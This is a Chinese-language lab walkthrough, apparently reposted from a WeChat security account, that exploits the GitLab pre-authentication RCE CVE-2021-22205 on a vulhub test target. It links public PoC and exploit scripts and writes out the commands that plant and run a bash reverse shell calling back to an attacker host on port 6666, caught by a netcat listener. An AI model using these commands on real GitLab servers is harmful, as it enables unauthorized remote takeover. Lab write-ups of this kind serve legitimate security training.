GitLab 预身份验证远程命令执行 (CVE-2021-22205)

admin 2024年8月12日10:49:51评论10 views字数 927阅读3分5秒阅读模式

 CVE-2021-22205

GitLab 预身份验证远程命令执行 (CVE-2021-22205)

看到了,关注一下不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP知识点,车联网渗透红队以及漏洞挖掘工具等信息分享,欢迎加入;以及想挖SRC逻辑漏洞的朋友,可以私聊。

01

CVE-2021-22205

        镜像拉取vulhub的靶机,部署好之后,访问:

http://192.168.134.128:8080/users/sign_in

GitLab 预身份验证远程命令执行 (CVE-2021-22205)

测试POC:

https://github.com/vulhub/vulhub/blob/master/gitlab/CVE-2021-22205/poc.pypython poc.py http://192.168.134.128:8080 "touch /tmp/success"

GitLab 预身份验证远程命令执行 (CVE-2021-22205)

GitLab 预身份验证远程命令执行 (CVE-2021-22205)

成功命令执行。下载EXP

https://github.com/Al1ex/CVE-2021-22205/blob/main/CVE-2021-22205.py

检查目标是否存在漏洞:

python CVE-2021-22205.py -v true -t http://192.168.134.128:8080

GitLab 预身份验证远程命令执行 (CVE-2021-22205)

在攻击机上利用该工具在目标服务器内写入反弹shell脚本:python CVE-2021-22205.py -a true -t http://192.168.134.128:8080/ -c "echo 'bash -i >& /dev/tcp/192.168.134.131/6666 0>&1' > /tmp/shell.sh"

GitLab 预身份验证远程命令执行 (CVE-2021-22205)

GitLab 预身份验证远程命令执行 (CVE-2021-22205)

写入成功,给权限并执行:

kali:nc -lvnp 6666python CVE-2021-22205.py -a true -t http://192.168.134.128:8080/ -c "chmod +x /tmp/shell.sh"python CVE-2021-22205.py -a true -t http://192.168.134.128:8080/ -c "/bin/bash /tmp/shell.sh"

GitLab 预身份验证远程命令执行 (CVE-2021-22205)

原文始发于微信公众号(道玄网安驿站):GitLab 预身份验证远程命令执行 (CVE-2021-22205)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月12日10:49:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   GitLab 预身份验证远程命令执行 (CVE-2021-22205)http://cn-sec.com/archives/3057826.html

发表评论

匿名网友 填写信息